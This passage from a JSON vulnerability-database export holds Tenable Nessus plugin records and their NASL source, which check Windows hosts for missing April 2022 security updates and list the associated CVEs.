hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:38", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012639. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2022-26915, CVE-2022-26831)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012649: Windows 7 and Windows Server 2008 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012649.NASL", "href": "https://www.tenable.com/plugins/nessus/159672", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159672);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n 
\"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012626\");\n script_xref(name:\"MSKB\", value:\"5012649\");\n script_xref(name:\"MSFT\", value:\"MS22-5012626\");\n script_xref(name:\"MSFT\", value:\"MS22-5012649\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012649: Windows 7 and Windows Server 2008 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012639. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2022-26915,\n CVE-2022-26831)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5012649 or Cumulative Update KB5012626.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012649',\n '5012626'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012649, 5012626])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:40", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26823, CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-26816, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": 
"SMB_NT_MS22_APR_5012596.NASL", "href": "https://www.tenable.com/plugins/nessus/159677", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159677);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n 
\"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26832\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012596\");\n script_xref(name:\"MSFT\", value:\"MS22-5012596\");\n script_xref(name:\"IAVA\", value:\"2022-A-0143-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012596: Windows 10 version 1607 / Windows Server 2016 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, \n CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, \n CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, \n CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, \n CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, \n CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, \n CVE-2022-24489, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24547, CVE-2022-24550, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. 
An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26823, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26811, \n CVE-2022-26809, CVE-2022-26918, CVE-2022-26917, \n CVE-2022-26813, CVE-2022-26826, CVE-2022-26824, \n CVE-2022-26815, CVE-2022-26814, CVE-2022-26916, \n CVE-2022-26822, CVE-2022-26829, CVE-2022-26820, \n CVE-2022-26819, CVE-2022-26818, CVE-2022-26825, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2022-26816, CVE-2022-24493, \n CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, \n CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012596\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012596\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012596'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012596])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:04", "description": "The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831 CVE-2022-26915, CVE-2022-23268) \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2022-26916, CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, CVE-2022-26830, CVE-2022-26918, CVE-2022-26826, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26920, CVE-2022-24493, CVE-2022-24498, CVE-2022-24483)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26808, CVE-2022-26807, CVE-2022-26795, CVE-2022-26792, CVE-2022-26794, CVE-2022-26904, CVE-2022-26803, CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, CVE-2022-26914, CVE-2022-26801, CVE-2022-26798, CVE-2022-26793, CVE-2022-26796, CVE-2022-26790, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012592: Windows 11 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", 
"CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26826", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012592.NASL", "href": "https://www.tenable.com/plugins/nessus/159671", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, In